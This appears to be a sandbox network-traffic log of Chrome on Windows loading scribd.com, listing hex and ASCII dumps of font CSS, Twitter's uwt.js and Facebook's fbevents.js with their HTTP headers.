                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ://s-f.scribdassets.com/webpack/assets/fonts/source_sans_pro/light/source_sans_pro_300.3a8176db.woff2) format("woff2"),url(https://s-f.scribdassets.com/webpack/assets/fonts/source_sans_pro/light/source_sans_pro_300.286c7279.woff) format("woff"),url(https:
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1378INData Raw: 73 3a 2f 2f 73 2d 66 2e 73 63 72 69 62 64 61 73 73 65 74 73 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 73 6f 75 72 63 65 5f 73 61 6e 73 5f 70 72 6f 2f 6c 69 67 68 74 2f 73 6f 75 72 63 65 5f 73 61 6e 73 5f 70 72 6f 5f 33 30 30 2e 76 69 65 74 6e 61 6d 65 73 65 2e 38 62 38 37 32 61 62 30 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 32 2d 30 31 30 33 2c 55 2b 30 31 31 30 2d 30 31 31 31 2c 55 2b 30 31 32 38 2d 30 31 32 39 2c 55 2b 30 31 36 38 2d 30 31 36 39 2c 55 2b 30 31 41 30 2d 30 31 41 31 2c 55 2b 30 31 41 46 2d 30 31 42 30 2c 55 2b 31 45 41 30 2d 31 45 46 39 2c 55 2b 32 30 41 42 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: s://s-f.scribdassets.com/webpack/assets/fonts/source_sans_pro/light/source_sans_pro_300.vietnamese.8b872ab0.woff2) format("woff2");unicode-range: U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+1EA0-1EF9,U+20AB;}@font-face {font-
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1378INData Raw: 2b 32 44 45 30 2d 32 44 46 46 2c 55 2b 41 36 34 30 2d 41 36 39 46 2c 55 2b 46 45 32 45 2d 46 45 32 46 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 66 61 6c 6c 62 61 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 53 6f 75 72 63 65 20 53 61 6e 73 20 50 72 6f 22 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 2d 66 2e 73 63 72 69 62 64 61 73 73 65 74 73 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 73 6f 75 72 63 65 5f 73 61 6e 73 5f 70 72 6f 2f 72 65 67 75 6c 61 72 2f 73 6f 75 72 63 65 5f 73 61 6e 73 5f 70 72 6f 5f 72 65 67 75 6c 61 72 2e 61 63 30 32 65 39 39 64 2e 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;}@font-face {font-display: fallback;font-family: "Source Sans Pro";font-style: normal;font-weight: 400;src: url(https://s-f.scribdassets.com/webpack/assets/fonts/source_sans_pro/regular/source_sans_pro_regular.ac02e99d.e


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        51192.168.2.1649775151.101.120.1574436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC526OUTGET /uwt.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: static.ads-twitter.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC543INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 58876
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 29 Oct 2024 01:22:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "4328e910de583ad53b3a7a76455af005"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000145-IAD, cache-cdg-lfpb1150063-CDG
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding,Host
                                                                                                                                                                                                                                                                                                                                                                                        P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
                                                                                                                                                                                                                                                                                                                                                                                        x-tw-cdn: FT
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1378INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 36 31 37 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3b 74 2e 65 78 70 6f 72 74 73 3d 28 72 3d 72 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 26 26 28 72 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2e 63 72 79 70 74 6f 26 26 28 72 3d 73 65 6c 66 2e 63 72 79 70 74 6f 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 26 26 28 72 3d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1378INData Raw: 74 68 69 73 2e 77 6f 72 64 73 3d 74 7c 7c 5b 5d 2c 74 68 69 73 2e 73 69 67 42 79 74 65 73 3d 6e 75 6c 6c 21 3d 65 3f 65 3a 34 2a 74 2e 6c 65 6e 67 74 68 7d 2c 74 6f 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 7c 7c 66 29 2e 73 74 72 69 6e 67 69 66 79 28 74 68 69 73 29 7d 2c 63 6f 6e 63 61 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 77 6f 72 64 73 2c 6e 3d 74 2e 77 6f 72 64 73 2c 72 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 2c 69 3d 74 2e 73 69 67 42 79 74 65 73 3b 69 66 28 74 68 69 73 2e 63 6c 61 6d 70 28 29 2c 72 25 34 29 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 69 3b 6f 2b 2b 29 7b 76 61 72 20 61 3d 6e 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 72 2b 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||f).stringify(this)},concat:function(t){var e=this.words,n=t.words,r=this.sigBytes,i=t.sigBytes;if(this.clamp(),r%4)for(var o=0;o<i;o++){var a=n[o>>>2]>>>24-o%4*8&255;e[r+o
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1378INData Raw: 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 64 2e 70 61 72 73 65 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 29 29 7d 7d 2c 70 3d 63 2e 42 75 66 66 65 72 65 64 42 6c 6f 63 6b 41 6c 67 6f 72 69 74 68 6d 3d 75 2e 65 78 74 65 6e 64 28 7b 72 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 64 61 74 61 3d 6e 65 77 20 73 2e 69 6e 69 74 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 3d 30 7d 2c 5f 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 68 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ion(t){return d.parse(unescape(encodeURIComponent(t)))}},p=c.BufferedBlockAlgorithm=u.extend({reset:function(){this._data=new s.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=h.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigByt
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1378INData Raw: 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 65 28 72 29 26 26 28 69 3c 38 26 26 28 63 5b 69 5d 3d 6e 28 74 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 75 5b 69 5d 3d 6e 28 74 2e 70 6f 77 28 72 2c 31 2f 33 29 29 2c 69 2b 2b 29 2c 72 2b 2b 7d 28 29 3b 76 61 72 20 73 3d 5b 5d 2c 6c 3d 61 2e 53 48 41 32 35 36 3d 6f 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 69 2e 69 6e 69 74 28 63 2e 73 6c 69 63 65 28 30 29 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 72 3d 6e 5b 30 5d 2c 69 3d 6e 5b 31 5d 2c 6f 3d 6e 5b 32 5d 2c 61 3d 6e 5b 33
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: r(var r=2,i=0;i<64;)e(r)&&(i<8&&(c[i]=n(t.pow(r,.5))),u[i]=n(t.pow(r,1/3)),i++),r++}();var s=[],l=a.SHA256=o.extend({_doReset:function(){this._hash=new i.init(c.slice(0))},_doProcessBlock:function(t,e){for(var n=this._hash.words,r=n[0],i=n[1],o=n[2],a=n[3
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1378INData Raw: 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 74 68 69 73 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 6e 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 74 79 70 65 6f 66 20 74 2b 22 20 22 2b 74 2b 22 20 69 73 20 6e 6f 74 20 69 74 65 72 61 62 6c 65 28 63 61 6e 6e 6f 74 20 72 65 61 64 20 70 72 6f 70 65 72 74 79 20 53 79 6d 62 6f 6c 28 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 29 29 22 29 29 3b 76 61 72 20 72 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 29 3b 69 66 28 30 3d 3d 3d 72 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 28 5b 5d 29 3b 76 61 72 20 69 3d 72 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: r i=function(t){return new this((function(e,n){if(!t||void 0===t.length)return n(new TypeError(typeof t+" "+t+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(t);if(0===r.length)return e([]);var i=r.lengt
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1378INData Raw: 76 6f 69 64 20 64 28 74 29 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 29 72 65 74 75 72 6e 20 76 6f 69 64 20 70 28 28 72 3d 6e 2c 69 3d 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 61 70 70 6c 79 28 69 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2c 74 29 7d 74 2e 5f 73 74 61 74 65 3d 31 2c 74 2e 5f 76 61 6c 75 65 3d 65 2c 64 28 74 29 7d 63 61 74 63 68 28 65 29 7b 66 28 74 2c 65 29 7d 76 61 72 20 72 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 2c 65 29 7b 74 2e 5f 73 74 61 74 65 3d 32 2c 74 2e 5f 76 61 6c 75 65 3d 65 2c 64 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 74 29 7b 32 3d 3d 3d 74 2e 5f 73 74 61 74 65 26 26 30 3d 3d 3d 74 2e 5f 64 65 66 65 72 72 65 64 73 2e 6c 65 6e 67 74 68 26 26 75 2e 5f 69 6d 6d 65 64 69 61 74 65 46 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: void d(t);if("function"==typeof n)return void p((r=n,i=e,function(){r.apply(i,arguments)}),t)}t._state=1,t._value=e,d(t)}catch(e){f(t,e)}var r,i}function f(t,e){t._state=2,t._value=e,d(t)}function d(t){2===t._state&&0===t._deferreds.length&&u._immediateFn
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1378INData Raw: 74 75 72 6e 20 6e 65 77 20 75 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 6e 28 74 29 7d 29 29 7d 2c 75 2e 72 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 75 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 61 28 74 29 29 72 65 74 75 72 6e 20 6e 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 50 72 6f 6d 69 73 65 2e 72 61 63 65 20 61 63 63 65 70 74 73 20 61 6e 20 61 72 72 61 79 22 29 29 3b 66 6f 72 28 76 61 72 20 72 3d 30 2c 69 3d 74 2e 6c 65 6e 67 74 68 3b 72 3c 69 3b 72 2b 2b 29 75 2e 72 65 73 6f 6c 76 65 28 74 5b 72 5d 29 2e 74 68 65 6e 28 65 2c 6e 29 7d 29 29 7d 2c 75 2e 5f 69 6d 6d 65 64 69 61 74 65 46 6e 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 65 74 49 6d 6d 65 64 69 61 74 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: turn new u((function(e,n){n(t)}))},u.race=function(t){return new u((function(e,n){if(!a(t))return n(new TypeError("Promise.race accepts an array"));for(var r=0,i=t.length;r<i;r++)u.resolve(t[r]).then(e,n)}))},u._immediateFn="function"==typeof setImmediate
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1378INData Raw: 68 72 6f 77 22 3d 3d 3d 69 29 74 68 72 6f 77 20 6f 3b 72 65 74 75 72 6e 20 43 28 29 7d 66 6f 72 28 6e 2e 6d 65 74 68 6f 64 3d 69 2c 6e 2e 61 72 67 3d 6f 3b 3b 29 7b 76 61 72 20 61 3d 6e 2e 64 65 6c 65 67 61 74 65 3b 69 66 28 61 29 7b 76 61 72 20 63 3d 67 28 61 2c 6e 29 3b 69 66 28 63 29 7b 69 66 28 63 3d 3d 3d 6c 29 63 6f 6e 74 69 6e 75 65 3b 72 65 74 75 72 6e 20 63 7d 7d 69 66 28 22 6e 65 78 74 22 3d 3d 3d 6e 2e 6d 65 74 68 6f 64 29 6e 2e 73 65 6e 74 3d 6e 2e 5f 73 65 6e 74 3d 6e 2e 61 72 67 3b 65 6c 73 65 20 69 66 28 22 74 68 72 6f 77 22 3d 3d 3d 6e 2e 6d 65 74 68 6f 64 29 7b 69 66 28 22 73 75 73 70 65 6e 64 65 64 53 74 61 72 74 22 3d 3d 3d 72 29 74 68 72 6f 77 20 72 3d 22 63 6f 6d 70 6c 65 74 65 64 22 2c 6e 2e 61 72 67 3b 6e 2e 64 69 73 70 61 74 63 68
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: hrow"===i)throw o;return C()}for(n.method=i,n.arg=o;;){var a=n.delegate;if(a){var c=g(a,n);if(c){if(c===l)continue;return c}}if("next"===n.method)n.sent=n._sent=n.arg;else if("throw"===n.method){if("suspendedStart"===r)throw r="completed",n.arg;n.dispatch
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1378INData Raw: 29 7d 28 69 2c 6f 2c 72 2c 61 29 7d 29 29 7d 72 65 74 75 72 6e 20 72 3d 72 3f 72 2e 74 68 65 6e 28 61 2c 61 29 3a 61 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 28 74 2c 65 29 7b 76 61 72 20 6e 3d 74 2e 69 74 65 72 61 74 6f 72 5b 65 2e 6d 65 74 68 6f 64 5d 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6e 29 7b 69 66 28 65 2e 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 22 74 68 72 6f 77 22 3d 3d 3d 65 2e 6d 65 74 68 6f 64 29 7b 69 66 28 74 2e 69 74 65 72 61 74 6f 72 2e 72 65 74 75 72 6e 26 26 28 65 2e 6d 65 74 68 6f 64 3d 22 72 65 74 75 72 6e 22 2c 65 2e 61 72 67 3d 76 6f 69 64 20 30 2c 67 28 74 2c 65 29 2c 22 74 68 72 6f 77 22 3d 3d 3d 65 2e 6d 65 74 68 6f 64 29 29 72 65 74 75 72 6e 20 6c 3b 65 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 65 2e 61 72 67 3d 6e 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )}(i,o,r,a)}))}return r=r?r.then(a,a):a()}}function g(t,e){var n=t.iterator[e.method];if(void 0===n){if(e.delegate=null,"throw"===e.method){if(t.iterator.return&&(e.method="return",e.arg=void 0,g(t,e),"throw"===e.method))return l;e.method="throw",e.arg=ne
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1378INData Raw: 61 74 6f 72 46 75 6e 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 72 65 74 75 72 6e 21 21 65 26 26 28 65 3d 3d 3d 64 7c 7c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 3d 3d 3d 28 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 65 2e 6e 61 6d 65 29 29 7d 2c 74 2e 6d 61 72 6b 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2c 68 29 3a 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 68 2c 63 28 74 2c 61 2c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 29 29 2c 74 2e 70
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: atorFunction=function(t){var e="function"==typeof t&&t.constructor;return!!e&&(e===d||"GeneratorFunction"===(e.displayName||e.name))},t.mark=function(t){return Object.setPrototypeOf?Object.setPrototypeOf(t,h):(t.__proto__=h,c(t,a,"GeneratorFunction")),t.p


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        52192.168.2.1649774157.240.195.154436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC535OUTGET /en_US/fbevents.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: connect.facebook.net
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                                                                                                                                                        report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                                                                                                                                                        content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-AkoxcMr2' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                                                                                                                                                        document-policy: force-load-at-top
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1670INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1INData Raw: 2f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC14680INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
